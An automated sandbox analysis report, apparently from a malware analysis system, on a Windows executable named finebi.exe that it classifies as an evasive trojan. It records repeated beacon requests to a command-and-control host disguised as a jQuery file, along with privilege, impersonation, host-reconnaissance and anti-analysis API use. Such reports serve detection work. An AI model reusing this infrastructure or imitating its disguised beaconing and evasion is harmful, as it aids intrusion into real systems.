Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: apiapi.mmkinskfn.xyz
Source: finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1515959738.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6815000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js-
Source: finebi.exe, 00000000.00000002.3098831995.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.3058585670.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js.
Source: finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0u
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2426098486.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0u4
Source: finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1515959738.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6815000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0uL
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2426098486.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0ud
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2426098486.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0us
Source: finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0ut
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06
Source: finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06F
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06d
Source: finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6815000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsD
Source: finebi.exe, 00000000.00000002.3098831995.000001D8B67AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsUm
Source: finebi.exe, 00000000.00000003.1515959738.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsnsock
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jst
Source: finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsward
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsward-
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9F110 GetStartupInfoA,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithLogonW,GetLastError,0_2_00007FF75DA9F110
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA958900_2_00007FF75DA95890
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA955000_2_00007FF75DA95500
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB66F00_2_00007FF75DAB66F0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA98EE00_2_00007FF75DA98EE0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9E5C00_2_00007FF75DA9E5C0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA97E100_2_00007FF75DA97E10
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA40A00_2_00007FF75DAA40A0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA947200_2_00007FF75DA94720
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA32500_2_00007FF75DAA3250
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA3A900_2_00007FF75DAA3A90
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA34C00_2_00007FF75DAA34C0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB4CA00_2_00007FF75DAB4CA0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA94CF00_2_00007FF75DA94CF0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA93F00_2_00007FF75DAA93F0
Source: C:\Users\user\Desktop\finebi.exeCode function: String function: 00007FF75DAA8CB0 appears 243 times
Source: finebi.exeBinary or memory string: OriginalFilename vs finebi.exe
Source: classification engineClassification label: mal68.troj.evad.winEXE@2/0@1/1
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA06B0 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00007FF75DAA06B0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9EDD0 memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,CloseHandle,ProcessIdToSessionId,CloseHandle,Process32NextW,CloseHandle,CloseHandle,0_2_00007FF75DA9EDD0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: finebi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\finebi.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\finebi.exe "C:\Users\user\Desktop\finebi.exe"
Source: C:\Users\user\Desktop\finebi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\finebi.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\finebi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: finebi.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: finebi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: finebi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: finebi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: finebi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: finebi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: finebi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: finebi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA91000 malloc,LoadLibraryA,FreeLibrary,GetProcAddress,GetModuleHandleA,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,memcpy,memset,VirtualFree,free,0_2_00007FF75DA91000

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9A8800_2_00007FF75DA9A880
Source: C:\Users\user\Desktop\finebi.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-14214
Source: C:\Users\user\Desktop\finebi.exeAPI coverage: 7.0 %
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9A8800_2_00007FF75DA9A880
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA95F00 malloc,memset,strncmp,GetCurrentDirectoryA,strncat_s,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00007FF75DA95F00
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA96460 malloc,FindFirstFileA,free,malloc,malloc,free,free,FindNextFileA,FindClose,0_2_00007FF75DA96460
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.3058470832.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2682215947.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1801147348.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2425982853.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756372527.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1515959738.000001D8B6832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: finebi.exe, 00000000.00000002.3098831995.000001D8B67AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW d
Source: C:\Users\user\Desktop\finebi.exeAPI call chain: ExitProcess graph end nodegraph_0-13566
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB9158 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75DAB9158
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA91000 malloc,LoadLibraryA,FreeLibrary,GetProcAddress,GetModuleHandleA,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,memcpy,memset,VirtualFree,free,0_2_00007FF75DA91000
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA93850 DeleteProcThreadAttributeList,GetProcessHeap,HeapFree,0_2_00007FF75DA93850
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB9158 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75DAB9158
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB84D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF75DAB84D0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB933C SetUnhandledExceptionFilter,0_2_00007FF75DAB933C
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9F600 LogonUserA,ImpersonateLoggedOnUser,GetLastError,GetLastError,0_2_00007FF75DA9F600
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA02F0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF75DAA02F0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA96D80 memcpy,CreateNamedPipeA,0_2_00007FF75DA96D80
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB901C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF75DAB901C
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9DBA0 GetUserNameA,GetComputerNameA,exit,gethostname,gethostbyname,GetModuleFileNameA,strrchr,GetProcAddress,GetModuleHandleA,GetProcAddress,0_2_00007FF75DA9DBA0
